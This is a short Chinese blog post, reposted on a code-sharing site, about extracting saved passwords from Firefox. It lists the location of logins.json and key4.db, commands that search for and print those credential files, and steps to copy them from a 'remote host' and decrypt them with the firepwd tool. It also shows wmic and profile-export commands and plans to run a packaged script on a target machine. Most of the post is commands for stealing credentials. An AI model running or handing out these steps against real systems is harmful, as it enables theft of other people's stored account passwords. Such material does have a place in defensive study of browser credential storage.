码迷,mamicode.com
首页 > 其他好文 > 详细

Firefox 密码脱取

时间:2020-07-02 19:46:09      阅读:64      评论:0      收藏:0      [点我收藏+]

标签:appdata   指定   odi   add   exec   导出   res   账号   word   

Firefox 密码脱取

正常获取

访问 about:logins

技术图片


配置文件获取

信息:

  • Website address
  • Username
  • Password
  • Created
  • Last modified
  • Last used

保存位置

%APPDATA%\Mozilla\Firefox\Profiles\xxxxxxxx.default\ #xxxxxxxx 为随机字母和数字的组合

logins.json文件

dir %APPDATA%\Mozilla\Firefox\Profiles\*logins.json /s /b

查看内容

type   C:\Users\x\AppData\Roaming\Mozilla\Firefox\Profiles\xx.default-release\logins.json

技术图片

可以查看到,所记录的URL,用户名,加密后的密码。创建时间等信息。

工具firepwd

https://github.com/lclevy/firepwd

python3 -m pip install -r requirements.txt ##安装 PyCryptodome>=3.9.0   pyasn1>=0.4.8

下载远程主机的 C:\Users\x\AppData\Roaming\Mozilla\Firefox\Profiles\xx.default-release\ 目录下的

  • key4.db
  • logins.json

本地执行

python firepwd.py -d new_db\

技术图片


获取到账号密码。

Firefox 配置文件导出

wmic process where name=‘firefox.exe‘ get executablepath,processid ##查看火狐浏览器位置
firefox.exe -profile C:\Windows\temp\data1 #启动firefox 并导出

会将Firefox 配置文件导入到指定目录。

未踩的坑

Master Password # 用户手工加了个面膜 (暂时没有遇到目标自己去做这件事,就先不研究了)

如有遇到,解密,用上面的脚本 加-p 参数 输入Master Password的密码 即可,

Todo

1.如果可以在对方机器执行EXE,自己打包python脚本 进行自动化或许

2.或者用go自己写一个..

Firefox 密码脱取

标签:appdata   指定   odi   add   exec   导出   res   账号   word   

原文地址:https://www.cnblogs.com/0xdd/p/13226624.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!